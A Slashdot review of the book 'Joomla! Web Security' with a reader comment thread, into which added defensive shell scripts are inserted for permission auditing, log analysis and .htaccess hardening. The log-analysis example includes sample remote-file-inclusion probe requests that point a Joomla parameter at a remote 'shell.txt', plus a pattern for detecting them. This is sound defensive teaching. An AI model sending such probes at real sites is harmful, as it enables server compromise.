
Joomla! Web Security

samzenpus posted more than 5 years ago | from the protect-ya-neck dept.


Stephen Brandon writes "It used to be that to set up a database-backed web site required at least a server guy, a database administrator, a programmer, and a designer. Joomla! and other modern CMS systems have opened the door to allow non-administrators to be able to set up complete e-commerce or informational sites, using great free software and easy-to-find commercial hosting. What then of security? A new book by Tom Canavan, Joomla Web Security, aims to bridge the knowledge gap, introducing Joomla! admins to a set of security tools, and skills sometimes found lacking in the Joomla! community." Read on for the rest of Stephen's review.

Joomla! Web Security is Packt Publishing's eighth Joomla! title, and they are to be congratulated for providing much-needed documentation for Open Source projects. Written by Tom Canavan and published in October 2008, it can be found under ISBN 1847194885 and 978-1-847194-88-6.

According to the back cover, this book is written for "anyone seriously using Joomla! for any kind of business. With this book they will be able to secure their sites, understand the attackers, and more, without the drudging task of looking up in forums, only to be flamed, or not even find the answers." Prior knowledge of Joomla is assumed, but prior knowledge of securing websites is not.

Why bother with a book on Joomla! security? In my experience, many people come to Joomla! from a design and content perspective. They are not server gurus, just people who know enough about design to select a good-looking template, then organize suitable content to meet the informational and marketing needs of the organization or business for whom they work.

Template – content – web host – the new site is up and running in short order. The first time the site goes down or the site is hacked however, such a site designer/administrator may well be struggling as the back cover quote suggests.

Although this volume is the only current one that I could find concentrating on Joomla! security, the Joomla! team does have a dedicated Security Task Force, and a fair amount of security information starting from http://docs.joomla.org/. The information on joomla.org, while comprehensive, is not as in-depth as most of the information in Joomla! Web Security.

Written in the author’s chatty, easy-to-read style, chapter 1 covers a lot of basics of Joomla! security, from checking that the installation files have not been tampered with, to choosing hosting, some php and apache settings, permissions, and setting up security metrics.

Given that the choice of hosting is one of the most crucial decisions determining site security and uptime, the author chooses to concentrate on some unexpected angles. Granted, the checklist of physical security is comprehensive (“Is there water detection under this raised floor? Do you have a man-trap entrance to the building?”), but the target audience might be better served by a similarly comprehensive checklist of how to choose safer shared hosting. Notable by its absence was any mention of suPHP, PhpSuExec (see tutorial) or any similar scheme for running PHP files under the ownership of the account-holder rather than the standard httpd or nobody user. Without this, any other client on your shared hosting can read your database credentials and almost certainly gain read-write access to your database — with it, clients on shared hosting are much more efficiently segregated, making shared hosting a more viable option for less security-critical installations.

Absent too was mention of Joomla! 1.5’s FTP layer. Whilst in Joomla! 1.0 you needed to set 777 permissions in order to install extensions or upload images and files via Joomla!, the FTP layer allows Joomla! to FTP these files to itself, maintaining a tighter permissions structure in the absence of suPHP or PhpSuExec.

The section “Setting Up Security Metrics” however shows the author’s strengths. This, chapter 2 “Test and Development” and chapter 10, “Incident Management”, prescribe a methodical approach to security, ensuring that you are well-prepared for any eventuality. For the more mission-critical of the sites that I administer, this has prompted me to review my procedures, but I suspect that these are chapters that will be glossed over by a majority of the target audience.

It’s this sort of dichotomy that mars the book slightly for me. What I would like to give to the Joomla! webmasters that I support as part of my day-job is a book that clearly explains common issues in the installation and administration of Joomla!. Joomla! Web Security seems to promise this, but isn’t willing to provide all the detail required by the less-experienced (no mention of what numerical file permissions actually mean, nor how to obtain the MD5 checksum of a file you downloaded), and seems a little too eager to jump up to higher-level management issues, as worthy as these topics are. And why is there a mini-tutorial on how to use the software development management system Lighthouse, when there are barely any step by step instructions with screenshots on specifically Joomla! topics anywhere in the book?
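To make concrete the two gaps just mentioned (what the permission digits mean, and how to check a downloaded or installed file against its MD5), together with the shared-hosting point about configuration.php raised above, here is a small audit script. It is an example added for this review, not code from the book or from the Joomla! project. It assumes GNU find and md5sum, a manifest in md5sum's own output format, and a JOOMLA_ROOT variable pointing at the document root to audit.

```shell
#!/bin/sh
# Added example for this review (not code from the book): audit a Joomla!
# document root for world-writable files, a configuration.php that other
# accounts on the server can read, and files whose MD5 differs from a
# manifest. Assumes GNU find/md5sum and a manifest in "md5sum" format.

# Turn an octal mode (644, 0755, 1777) into rwx form. Each of the last three
# digits is owner, group, other; inside a digit 4 = read, 2 = write,
# 1 = execute. So 777 means every account on the box can write the file.
decode_mode() {
    digits=$(printf '%s' "$1" | sed 's/^.*\(...\)$/\1/')
    out=""
    for d in $(printf '%s' "$digits" | sed 's/./& /g'); do
        r="-"; w="-"; x="-"
        [ $((d & 4)) -ne 0 ] && r="r"
        [ $((d & 2)) -ne 0 ] && w="w"
        [ $((d & 1)) -ne 0 ] && x="x"
        out="$out$r$w$x"
    done
    printf '%s\n' "$out"
}

# List everything under $1 that any account on the server can write to.
# Joomla! 1.0 installs were routinely chmod 777'd so the web-server user
# could install extensions; the 1.5 FTP layer or suPHP removes that need.
find_world_writable() {
    find "$1" ! -type l -perm -002
}

# Succeed (0) only if configuration.php is not readable by "other". Under
# suPHP/PhpSuExec PHP runs as the account owner, so mode 600 works. Under
# plain mod_php the file has to stay readable by the web-server user, which
# is the user every other customer's scripts run as too: that is the
# shared-hosting problem the review describes.
config_private() {
    f="$1/configuration.php"
    if [ ! -f "$f" ]; then
        echo "no configuration.php under $1" >&2
        return 2
    fi
    if [ -n "$(find "$f" -perm -004)" ]; then
        echo "WARNING: $f is world-readable" >&2
        return 1
    fi
    return 0
}

# Check installed files against a manifest of "md5sum" lines
# ("<hash>  <relative path>") made from the pristine download, so a
# modified or trojaned file shows up. Non-zero on any mismatch or missing file.
verify_manifest() {
    dir=$1; manifest=$2
    (cd "$dir" && md5sum -c --status "$manifest")
}

audit_joomla_root() {
    root=$1
    echo "== world-writable paths under $root =="
    find_world_writable "$root"
    echo "== configuration.php =="
    config_private "$root" && echo "ok: not world-readable"
    if [ -f "$root/MANIFEST.md5" ]; then
        echo "== checksum verification =="
        verify_manifest "$root" MANIFEST.md5 && echo "ok: all files match"
    fi
}

# Usage: JOOMLA_ROOT=/var/www/example sh audit.sh   (path is an assumption)
if [ -n "${JOOMLA_ROOT:-}" ]; then
    audit_joomla_root "$JOOMLA_ROOT"
fi
```

Build MANIFEST.md5 from the untouched download (for example `find . -type f -name '*.php' | xargs md5sum > MANIFEST.md5` before the first deploy) and keep it outside the web root; a manifest the attacker can rewrite proves nothing. Note that the configuration.php check only passes on suPHP-style hosting; under mod_php there is no mode you can set that keeps the web-server user out while still letting Joomla! read its own config.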

On a positive note, chapter 3’s “Tools” introduced me to some previously-unknown packages as well as some old friends. Every Joomla! administrator should become familiar with these: HISA (J! 1.0 only), the Joomla! Tools Suite (J!1.5 only in legacy mode), Joomla! Diagnostics (some problems on J!1.5), JCheck (J!1.5 only works in cron mode). The obvious issue is that many of these don’t operate fully or at all for Joomla! 1.5. The sections on NMAP, Wireshark, Metasploit and Nessus however are well written and relevant.

If anyone needs convincing that the threats to a Joomla! site are real, point them to the central chapters of this book. Here Tom Canavan lays out “How the Bad Guys Do It”, and details the anatomy of attacks. This is a real eye-opener and should be required reading for any budding site administrator. It’s good to see a checklist of further topics for study (p. 144).

Finally we return to more specifically Joomla! topics. A section of recipes for .htaccess and php.ini files covers such useful topics as apache’s mod_redirect, password protection and access control. The “Log Files” chapter is pleasingly Joomla!-specific and also covers some logfile analysis tools.
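As an added illustration of the kind of log-file analysis that chapter is about (this is the editor's example, not material from the book), the script below runs two awk passes over an Apache combined-format access log: one counts clients refused at /administrator, the other picks out requests that pass a whole URL inside a query-string parameter, the usual shape of a remote-file-inclusion probe against a careless extension. The log lines are constructed for the example and the two patterns are heuristics, not a signature list; the ACCESS_LOG path is an assumption.

```shell
#!/bin/sh
# Added example for the "Log Files" discussion, not from the book. The log
# lines are constructed; the patterns are heuristics, not a signature list.

LOG_SAMPLE=$(cat <<'EOF'
203.0.113.7 - - [10/Feb/2009:10:01:02 +0000] "GET /administrator/ HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2009:10:01:03 +0000] "GET /administrator/ HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Feb/2009:10:01:04 +0000] "GET /administrator/index.php HTTP/1.1" 401 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Feb/2009:10:05:00 +0000] "POST /administrator/index.php HTTP/1.1" 403 210 "-" "curl/7.19"
192.0.2.9 - editor [10/Feb/2009:10:07:11 +0000] "GET /administrator/index.php HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Feb/2009:10:08:40 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 6431 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Feb/2009:10:09:15 +0000] "GET /index.php?option=com_example&path=http://203.0.113.50/shell.txt? HTTP/1.1" 200 6431 "-" "libwww-perl/5.8"
198.51.100.4 - - [10/Feb/2009:10:09:16 +0000] "GET /components/com_example/helper.php?base=http%3A%2F%2F203.0.113.50%2Fshell.txt HTTP/1.0" 404 301 "-" "libwww-perl/5.8"
EOF
)

# Count refused hits on /administrator per client, busiest first.
# 401 = missing or wrong Basic Auth credentials, 403 = blocked by an access
# rule. Combined-format fields: $1 client, $7 request path, $9 status.
admin_refusals() {
    awk '$7 ~ /^\/administrator/ && ($9 == 401 || $9 == 403) { n[$1]++ }
         END { for (ip in n) printf "%d %s\n", n[ip], ip }' "$@" | sort -rn
}

# Show requests whose query string hands a whole URL to a parameter, the
# shape of a remote-file-inclusion probe. Both the raw and the
# percent-encoded form of "http://" are matched; a 200 on such a request
# deserves a look at what that component did with the parameter.
rfi_probes() {
    awk '$7 ~ /\?.*=(https?:\/\/|https?%3[Aa]%2[Ff]%2[Ff])/ { print $1, $7 }' "$@"
}

# Usage on a real log: ACCESS_LOG=/var/log/apache2/access.log sh loganalysis.sh
# (path is an assumption; with no file argument both functions read stdin)
if [ -n "${ACCESS_LOG:-}" ]; then
    echo "== refused /administrator hits per client =="
    admin_refusals "$ACCESS_LOG"
    echo "== possible remote-file-inclusion probes =="
    rfi_probes "$ACCESS_LOG"
fi
```

On the sample, `printf '%s\n' "$LOG_SAMPLE" | admin_refusals` puts 203.0.113.7 on top with three refusals, and `rfi_probes` lists the two requests from 198.51.100.4. The interesting one is the probe that got a 200: a 404 means the targeted extension is not installed, a 200 means some code ran with an attacker-supplied URL and the response body and that component's source need reading.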

Joomla! Web Security is rounded off with an appendix summarizing some of the key points of the book, and listing port numbers, apache status codes and TLD domain codes. The list of critical settings for .htaccess and php.ini is prescriptive and useful in this format.
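For readers who want the .htaccess and php.ini recipes in runnable form, the script below writes the three files a Joomla! admin on 2008-era Apache 2.2 shared hosting would typically deploy: Basic Auth in front of /administrator, a site-root .htaccess that hides configuration.php and stray backups and turns off register_globals and display_errors, and a php.ini fragment for the switches that cannot be set per directory. This is the editor's added example, not the book's own recipe list; it assumes Apache 2.2 access-control syntax (Order/Deny), mod_php for the php_flag lines, an htpasswd file kept outside the document root, and the directory paths passed in.

```shell
#!/bin/sh
# Added example, not the book's recipes. Assumes Apache 2.2 (Order/Deny
# syntax), mod_php for php_flag, htpasswd file outside the document root.

# Basic Auth in front of the admin area. Credentials travel base64-encoded,
# so this only makes sense over HTTPS; it shuts out the blind login-guessing
# bots against /administrator rather than a targeted attacker.
# Create the password file first: htpasswd -c /home/user/.htpasswd admin
write_admin_htaccess() {
    dir=$1; passwd_file=$2
    cat > "$dir/.htaccess" <<EOF
AuthType Basic
AuthName "Joomla administrator"
AuthUserFile $passwd_file
Require valid-user
EOF
}

# Site-root rules. Nobody needs configuration.php or editor backup copies
# over HTTP (PHP reads the config from disk). register_globals and
# display_errors are PHP_INI_PERDIR/PHP_INI_ALL, so mod_php honours them
# here. Caveat: under suPHP/CGI the php_flag lines are unknown directives
# and produce a 500; on such hosts drop them and use php.ini instead.
write_root_htaccess() {
    cat > "$1/.htaccess" <<'EOF'
<Files configuration.php>
    Order allow,deny
    Deny from all
</Files>
<FilesMatch "\.(bak|old|orig|sql|php~)$">
    Order allow,deny
    Deny from all
</FilesMatch>
php_flag register_globals off
php_flag display_errors off
EOF
}

# allow_url_fopen and allow_url_include are PHP_INI_SYSTEM: they cannot be
# set from .htaccess at all. suPHP/CGI hosts usually read a per-account
# php.ini; on mod_php hosts only the provider can change them.
write_php_ini() {
    cat > "$1/php.ini" <<'EOF'
register_globals = Off
display_errors = Off
log_errors = On
allow_url_fopen = Off
allow_url_include = Off
expose_php = Off
EOF
}

# Usage: sh recipes.sh /var/www/example /home/user/.htpasswd  (paths assumed)
if [ -n "${1:-}" ] && [ -n "${2:-}" ]; then
    write_admin_htaccess "$1/administrator" "$2"
    write_root_htaccess "$1"
    write_php_ini "$1"
fi
```

Two checks after deploying: fetch /configuration.php and /administrator/ with a browser and confirm a 403 and a credentials prompt respectively, and run `php -i | grep allow_url` from the account to see whether the php.ini was actually picked up. On Apache 2.4 the Order/Deny pairs become `Require all denied`.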

While writing this review I noticed that the author has written a previous volume on a similar topic: Dodging the Bullets — A Disaster Preparation Guide for Joomla! Based Websites. Critical reviews of that book suggested that it was aimed towards the larger corporate user of Joomla!, and held little for the Joomla! administrator who simply needed to know and understand the settings and tools required for site security. This volume redresses the balance somewhat, with more hands-on advice, and I would recommend it over Dodging the Bullets for the average Joomla! administrator.

Though Joomla! Web Security is a worthwhile addition to a Joomla! bookshelf, my wish would still be for an even more practical guide, particularly one addressing J!1.5 developments and going into much more detail about selecting a hosting partner. Even without this, however, there is a ton of good information here and I recommend the book.

Availability: On the publisher’s web page for this book you will find the TOC, general introduction, a link to the sample chapter, code download, and facilities for on-line purchase. Various discounts and bundles (including Adobe e-book) are offered on the site; hard copies are also available through Barnes and Noble and other usual channels.

Stephen Brandon is author of the popular MetaMod Joomla! module and web manager for an international non-profit organization."



I'd recommend... (1)

jornak (1377831) | more than 5 years ago | (#26960507)

http://www.joomlabook.com/ [joomlabook.com]
It's 1.5-specific.

oh boy (-1, Flamebait)

paimin (656338) | more than 5 years ago | (#26960523)

cue the joomla-sucks-drupal-rocks trolls in 3...2...1...

Re:oh boy (1)

paimin (656338) | more than 5 years ago | (#26963239)

Mod me flamebait all you want, the Drupal-vs-Joomla "there can be only one" pissing contest is for babies. If you can't see that these two packages target completely different sets of needs, and that they are co-existing just fine, pull your head out.

4 Easy steps: (0)

Anonymous Coward | more than 5 years ago | (#26960547)

Step 1: Create online security forum for e.$ CMSes.

Step 2: Log IP's. Troll the forum, looking for people blurting out useful information.

Step 3: ???

Step 4: Profit.

(Optional) Step 5: Chortle into large money pit.

Personal preference. (4, Insightful)

palegray.net (1195047) | more than 5 years ago | (#26960667)

I used Joomla! (gotta love applications with punctuation in the name) extensively in the past for several sites, but wound up getting frustrated with the amount of effort I had to put into maintaining them. For the work involved, it ended up making more sense to roll a custom "mini-CMS" platform for a couple of sites, which fit the needs of their systems precisely without any extra cruft.

These days, when friends ask for an easy web publishing platform I simply set them up with a WordPress site on one of my servers.

Re:Personal preference. (1)

JCSoRocks (1142053) | more than 5 years ago | (#26960773)

I ran into a similar problem recently myself. I needed to create a small site where only a few of the pages needed CMS functionality. Only the owners of the site would be updating the content. I looked into Joomla! and Drupal as well as a handful of others but they all just seemed like too much for what I was trying to accomplish. By the time you dig through them and then finally get them skinned the way you want you might as well have just written your own (which is what I ended up doing).

Has anyone else run into this? All I really needed was some sort of CMS-lite that just provides a framework for authentication, forms based data manipulation, and (obviously) skinnable data presentation. In the past I've even tried using MediaWiki for this, but skinning that thing to get the layout I wanted turned into a real hassle.

Re:Personal preference. (3, Informative)

0racle (667029) | more than 5 years ago | (#26960961)

framework for authentication, forms based data manipulation, and (obviously) skinnable data presentation

Django might be an option. It is not a CMS, it is just a framework but if you really ended up writing your own CMS this shouldn't scare you and in many cases, Django will probably make the job easier.

Re:Personal preference. (1)

p0 (740290) | more than 5 years ago | (#26962545)

Rails too...

Re:Personal preference. (0)

Anonymous Coward | more than 5 years ago | (#26961101)

Radiant, a "no fluff" ruby on rails CMS perfect for small sites.

http://www.radiantcms.org

Out of the box it is extremely simple to get a site running and is very flexible. It also has a plugin mechanism and a small community of developers at http://ext.radiantcms.org

Re:Personal preference. (1)

wwwillem (253720) | more than 5 years ago | (#26964597)

Same experience here. Joomla and Drupal are great CMS systems, but not something that as a web developer at the end of the project you can hand over to your "non IT" client.

I ended up using "CMS Made Simple" [cmsmadesimple.org] . The name is of course absolutely horrific, but the same can be said for MySQL :-) .

For me it provided the right amount of customization options, but on the other end, non-IT folks (like my customer's secretary) are able to add new pages and other content. OK, to "start from scratch" will probably be too tough a call. But in a scenario where once a month a newsletter page has to be put online, CMSMS going along with a simple list of instructions will allow her to do that with very little hand-holding.

YMMV, but for a simple site, I recommend anyone to check this out.

Re:Personal preference. (1)

Low Ranked Craig (1327799) | more than 5 years ago | (#26960953)

I never use a program with an "!" in the title.

I agree with you 100%. I find that, in general, it's less work and more maintainable to simply create the tables the customer needs for their specific site and code it up in PHP, using a library of common functions I've built over the years. I give them a tailored back end admin console, that is very specific to their site and content, generally using something like PHPMaker.

Re:Personal preference. (1)

spun (1352) | more than 5 years ago | (#26960967)

Have you used 1.5? It gets rid of the cruft, as everything in Joomla is now a module. It also makes maintenance easier, as there is no core for modules to trample on, just a container using inversion of control.

That being said, I agree that for most personal websites, Joomla is overkill and WordPress will work just fine.

Re:Personal preference. (1)

palegray.net (1195047) | more than 5 years ago | (#26961063)

I have used 1.5, actually. I agree that it's a vast improvement over the way things were done before.

Re:Personal preference. (1)

mckinnsb (984522) | more than 5 years ago | (#26965307)

I used Joomla! (gotta love applications with punctuation in the name) extensively in the past for several sites, but wound up getting frustrated with the amount of effort I had to put into maintaining them. For the work involved, it ended up making more sense to roll a custom "mini-CMS" platform for a couple of sites, which fit the needs of their systems precisely without any extra cruft. These days, when friends ask for an easy web publishing platform I simply set them up with a WordPress site on one of my servers.

Agreed, for the most part. I used to work at a high-end guitar store that used Joomla! exclusively. After nearly two years of past employees who made crude hacks with no comments, half-installed modules, and little to no documentation, maintaining what should be a simple e-commerce website proved to be onerous for me.

I don't think that this book deserves to be allocated to the male restroom when toilet paper has run dry, however. A lot of e-commerce websites run off Joomla - and a lot of them are run by 'Mom and Pop' stores that do nearly all of their business online while having a collective technical background of slim to none. I haven't read this book, but I'm guessing from the review that it's written from a fairly non-technical standpoint, and that's exactly what is needed.

I'm sure your average ./'er doesn't need this book, but when I was working at said guitar store, I spent my idle hours patrolling the Joomla! Security forums and answering people's cries for help. There were a *lot* of cries for help. A lot of users didn't know what file permissions were, or what their root public directory was, or (god forbid) what an .htaccess file was or how to set it up to protect against the most basic of 'attack vectors'. In fact, it was so bad that I would often create .htaccess files *for* people - and there were even times when people gave me their root password - after I simply laid out exactly, in plain english, line by line, what they had to do. I was bored and feeling generous, and maybe they were afraid and lazy, but I was often shocked at how quickly people would give me root passwords. Those people need this book.

One of the things I've always liked about software packages like Joomla, WordPress, Drupal & Company is that they empower the non-technically minded to publish themselves on the internet, and even go so far as to forge a web business for themselves. While the technical community doesn't really need software packages like these, because when I want something quick and dirty I use RoR, CI or Django depending on my environment, I feel this is truly a noble goal. The vast majority of Joomla! users are not IT people - but this book is not for IT people. This book is more for the couple in Oregon that sells baby clothing out of their garage.

Would I buy this book for myself? Nope. Would I buy it for my old boss at the guitar store? Yep.

Poll ... (1)

Rhabarber (1020311) | more than 5 years ago | (#26960725)

Who else hate the embedded exclamation mark ?

Re:Poll ... (1)

Rhabarber (1020311) | more than 5 years ago | (#26960741)

Yea, I know, s/hate/hates/

Re:Poll ... (1)

harry666t (1062422) | more than 5 years ago | (#26962593)

I do.

Especially since my day job mostly involves maintaining a website based on Joomla.

Re:Poll ... (0, Troll)

Rhabarber (1020311) | more than 5 years ago | (#26963193)

Well!, Could! be! worse! like! SharePoint? :)

Hey, modder, (1)

Rhabarber (1020311) | more than 5 years ago | (#26965245)

that's no troll just joke ... have a nice day :)

Re:Poll ... (0)

Anonymous Coward | more than 5 years ago | (#26963757)

Then I imagine you'd enjoy creating a Joomla! site for Yahoo! whilst based in Westward Ho! wouldn't you?

Re:Poll ... (1)

Yetihehe (971185) | more than 5 years ago | (#26966775)

My job involves installing other CMSs for clients which formerly used joomla ;). Typically I use typo3. It's very neat. I've also tried drupal and ezpublish. Drupal is ok, ezpublish for me was the best idea, but it was so overbloated and slow running, that one client who really wanted it, after everything was finally done, generated static html and served it instead.

Yawn. Nothing to do with Joomla OR web security (4, Insightful)

m-wielgo (858054) | more than 5 years ago | (#26960727)

Clearly, neither the author of the book, nor reviewer understand web security.

If you want to learn about securing web servers, why not read Ivan Ristic's Apache Security?

Apparently, from the topics discussed in this review, this book has nothing to do with writing secure applications using the Joomla Framework. Seriously, file permission? Using Nmap? Nessus? Talk about using the wrong tools for the job. Not even the Joomla Security page [joomla.org] has anything do with actual web application security.

How about going over topics like secure session management, input validation, parameterized queries, output entity encoding, etc?

Take a clue from OWASP [owasp.org] and skip this book.

Re:Yawn. Nothing to do with Joomla OR web security (2, Insightful)

metamodguy (1485123) | more than 5 years ago | (#26963317)

OWASP is excellent and should be required study for anyone writing web applications...

m-wielgo is right on another point too - this book is not about writing secure applications using the Joomla framework. It's for people setting up Joomla web sites, not for programmers.

There are other books available on Joomla programming, including one published recently, and such information belongs in those books.

There are many aspects to security. Good programming practise is extremely important, and if the underlying CMS is badly coded then there's no point in trying to teach good sysadmin on top of it. I don't happen to think that this is such a problem with Joomla, especially recently. Some of the extensions are another matter. But when you have over 4400 extensions available for Joomla you can't assume all of them are well coded, and you need some skills to evaluate things before putting them into production on your site.

Another side of security is physical security - well covered in this book.

Another is about making good decisions in the whole process - choice of CMS, choice of hosting, choice of add-ons. Some of this is covered in this book.

Another is about contingency planning and corporate responsibility, angles that Tom Canavan addresses at length.

And so the list goes on.

When there are so few books available to train budding Joomla admins, I think the choice of angle to take in a book is very important. What's going to help the most people get up to speed on good solid security practises, and avoid the greatest number of security incidents?

I need my admins to know about apache setup/security. File permissions. PhpSuExec etc. Good passwords. HTTP Basic Auth and SSL for admin tasks. Choosing a good host. How to evaluate Joomla extensions. Good backup procedures. Logging and how to read logs. Testing. Recognising attacks. Knowing when to fix symptoms vs when to reinstall from scratch and/or move hosting.

Many of these are covered in this book (to some degree), and for that I say it's useful. At the very least it's a good start, as a lot of the skills mentioned come with practise and experience.

Stephen Brandon

Re:Yawn. Nothing to do with Joomla OR web security (1)

Yetihehe (971185) | more than 5 years ago | (#26966793)

Face it, joomla is just the most insecure popular cms out there. On my company page we typically register dozens of automated attacks for joomla (no, we don't even use it, but bots still try to inject some code for joomla blindly on any page).

Most insecure popular CMS? I don't think so! (1)

metamodguy (1485123) | more than 5 years ago | (#26967153)

"Most insecure popular CMS out there" - That's a crazy assertion - measuring insecurity by the number of automated attacks?

If you look at milw0rm there may seem to be a number of reported vulnerabilities, but they are almost completely due to 3rd party extensions, most of which I have never heard of. And that's not surprising considering there are over 4400 3rd party extensions listed on the extensions.joomla.org site.

Modern (1.5) Joomla has come a long way and a lot of attention is being paid to security issues. One of the main mistakes people make is to install a whole bunch of 3rd party extensions that they don't understand, and have no idea how to evaluate.

Stephen Brandon

_!_ (1, Funny)

Lord Ender (156273) | more than 5 years ago | (#26960753)

Out of principle, I refuse to use any product with an exclamation point its name. Join me, and let's fight this marketing evil together.

Re:_!_ (0)

MightyYar (622222) | more than 5 years ago | (#26960869)

Some of you guys get hung up on the funniest things :)

Then again, people find it weird that I've decided to boycott 'k' for being redundant. That's a whole different cettle of fish, though.

Re:_!_ (1)

Samschnooks (1415697) | more than 5 years ago | (#26960877)

Out of principle, I refuse to use any product with an exclamation point its name. Join me, and let's fight this marketing evil together.

I'm starting a movement to get rid of the _@_ symbol. This has worked with other symbols on products. Most notably the '*' with the Pentax' "*ist" line of cameras. Everybody hated that name! I'd like to sign up as an ally organization for banning '@', '!' and the '&' in product names. We may get the guys who were against the '*' reactivated and the guys against '#'. Unfortunately, the cartoonists will give us some grief because their livelihoods depend on "^%$*^&&@$&%". So expect them to give us a bit of a fight. Oh, and General Mills will come after us for the '&'.

Re:_!_ (1)

Mozk (844858) | more than 5 years ago | (#26965193)

Heh, the General Mills symbol is a cursive G, not an ampersand.

Seriously, let's just ban cursive, and not just in product names. For FSM's sake, nobody uses it, schools don't teach it anymore, and it looks pretentious.

Re:_ _ (0)

Anonymous Coward | more than 5 years ago | (#26961459)

Well, you see I would but I have the use of an exclamation mark in names so much that I can't support your ban on the use of an exclamation mark in names since you used one in your post's title.

Re:_!_ (1)

InlawBiker (1124825) | more than 5 years ago | (#26961481)

I'm with you my brother. Email me on my Yahoo! account.

If it makes me feel stupid to say it out loud... (1)

AmazingRuss (555076) | more than 5 years ago | (#26964277)

...I'm probably not going to use it.

Great Timing (0)

Anonymous Coward | more than 5 years ago | (#26960771)

Great timing on the article... At least five vulnerabilities related to Joomla have been discovered since Christmas...

If you want to feel secure... (1)

timpintsch (842091) | more than 5 years ago | (#26960777)

What's wrong with good old fashioned HTML? Those sites never, ever get hacked... Just give me 1 example... wait... oh... right.

Re:If you want to feel secure... (2, Interesting)

palegray.net (1195047) | more than 5 years ago | (#26960981)

I know your post was in jest, but you make a good point. A lot of folks are using CMS platforms to publish very simple websites, and wind up dealing with all sorts of security problems.

The issue stems from the fact that raw beginners don't have a good background in web development to start with, hence their need to use "point and click" publishing tools. While it's true that there's no such thing as a totally secure system, people rapidly find out that there's a lot more to safely hosting a company's website than clicking through a PHP installer page.

Re:If you want to feel secure... (1)

timpintsch (842091) | more than 5 years ago | (#26961085)

Thank you, this was my point exactly. Sometimes less is more, now to be completely transparent, I use Joomla, a lot. I also try to shore up security on quite a few installations. Often I find the objectives of a person using Joomla are just as easily obtained making a good old fashioned HTML page with tables... and in some cases, even poorly thought out frames...

But, to wit, this book does serve a function. Please also note I did not use an !

Joomla! Security (5, Funny)

jalefkowit (101585) | more than 5 years ago | (#26960785)

... brought to you by the Department of Words That Don't Go Together.

Re:Joomla! Security (1)

CompMD (522020) | more than 5 years ago | (#26960821)

"Joomla! Web Security"

This must be either the shortest or longest book ever written, I can't decide which.

Re:Joomla! Security (1)

palegray.net (1195047) | more than 5 years ago | (#26960997)

Neither can the author, apparently. Books like this are the dead-tree equivalent of "blogging for dollars" IMHO.

Re:Joomla! Security (1)

Swampash (1131503) | more than 5 years ago | (#26965317)

Ever since my employer's corporate site was hacked and defaced by attackers who got in via a bug in Joomla, I've pretty much thought of Joomla and security as mutually-exclusive concepts.

joomla!? (-1)

Anonymous Coward | more than 5 years ago | (#26960891)

Let's see... PHP and MySQL... thanks, but no thanks. Honestly, the Open Source community should get together and do an intervention for both of them. Either clean up and stop sucking or go closed source. We don't need their failure making Open Source look bad.

Re:joomla!? (1)

palegray.net (1195047) | more than 5 years ago | (#26961033)

You're blaming a programming language and database platform for large-scale security issues? The vast majority of security incidents are clearly traced back to programmers failing to practice basic safe coding techniques. You can write crappy, insecure code in any language, linking to any given database, running on any given platform.

Re:joomla!? (0)

Anonymous Coward | more than 5 years ago | (#26961261)

Correction: a shitty programming language and database that encourage stupid behavior and make doing the right thing difficult.

Re:joomla!? (1)

palegray.net (1195047) | more than 5 years ago | (#26961449)

C encourages stupid behavior, yet mysteriously remains the most commonly used programming language in terms of lines of code on the planet. Odd.

Re:joomla!? (1)

magsol (1406749) | more than 5 years ago | (#26962517)

Actually, it doesn't. It assumes the programmer knows what they're doing and gives them free rein to do just that. It doesn't take a whole lot of screwing up for the application to go haywire a la segfault, bus errors, etc.

Stupid behavior, on the other hand, encourages stupid behavior, and picking a language which assumes you know what you're doing when you actually don't is the true mistake.

Ok Joomla fans, sell me (1)

snowwrestler (896305) | more than 5 years ago | (#26960901)

I've previously asked here for feedback on Joomla [slashdot.org] , and got some comments that gave me pause. I'd love to hear more from people who like Joomla (are you out there??). One complaint was that Joomla extensions often cost money, but I don't mind spending money if it will do what we need. So set cost aside please.

I need a CMS because many in my organization are not tech-savvy but need to update page content--and we've got thousands of pages. I do not want to code up my own CMS--too slow and costly. I'd much prefer to start with an OSS platform and customize. We have a site going up on Joomla now that will act as a test. We're also planning to test out Drupal, and maybe Plone (tougher due to Zope/Python learning curve?).

The site will be almost entirely content. It will need to be updated by non-technical staff, specifically uploading PDFs, creating new pages, and applying tags from multiple fixed taxonomies. It will need to handle user accounts and control editing permissions down to the page level. We do our own design so theming shouldn't be too hard, and the more flexible in content placement the better.

Thanks in advance.

Re:Ok Joomla fans, sell me (1)

J05H (5625) | more than 5 years ago | (#26961485)

Joomla is an excellent choice for publishing by non-technical staff. Personally i'd rather dig my eyes out with a spoon than work in Drupal. Haven't done much with Plone but Zope used to be tons of fun despite the learning curve. Not recommended for the non-technical.

Re:Ok Joomla fans, sell me (1)

snowwrestler (896305) | more than 5 years ago | (#26963983)

What specifically do you not like about Drupal? Thanks.

Re:Ok Joomla fans, sell me (1)

micheas (231635) | more than 5 years ago | (#26967035)

What specifically do you not like about Drupal? Thanks.

A user interface that makes kittens cry? (That is a description by one of the core drupal developers about one of the admin screens.)

Drupal's user interface has gotten a lot better lately, and in 6.0 is approaching not bad and if any one is looking at drupal for the first time I would recommend Acquia's version of drupal it has a lot of the drupal annoyances papered over but is not a fork but drupal with a nice set of extensions that you were going to spend a couple weeks tracking down and installing.

Re:Ok Joomla fans, sell me (1)

J05H (5625) | more than 5 years ago | (#26972097)

played with it once and hated the structure. Not sure what the turn-off was, but didn't like it, summary judgement.

Re:Ok Joomla fans, sell me (2, Informative)

FishWithAHammer (957772) | more than 5 years ago | (#26961487)

If you are going to be dealing with a site of that size with those requirements, Joomla is probably not what you want. (I would argue that Joomla is never what you want, because it sucks, but I digress.) I think you want Drupal.

Joomla content is just that--a blob of content. Title, body, section, category, done. Drupal allows you to define node types for your content using the Content Construction Kit (CCK), adding text fields, user-reference fields, images, even just files--so you can tie your PDF to a node and give it taxonomic tags on-the-fly, rather than Joomla's boneheaded section/category system (which does not support multiple tags). Creation of new pages is about the same in each, though I prefer Drupal's interface for management.

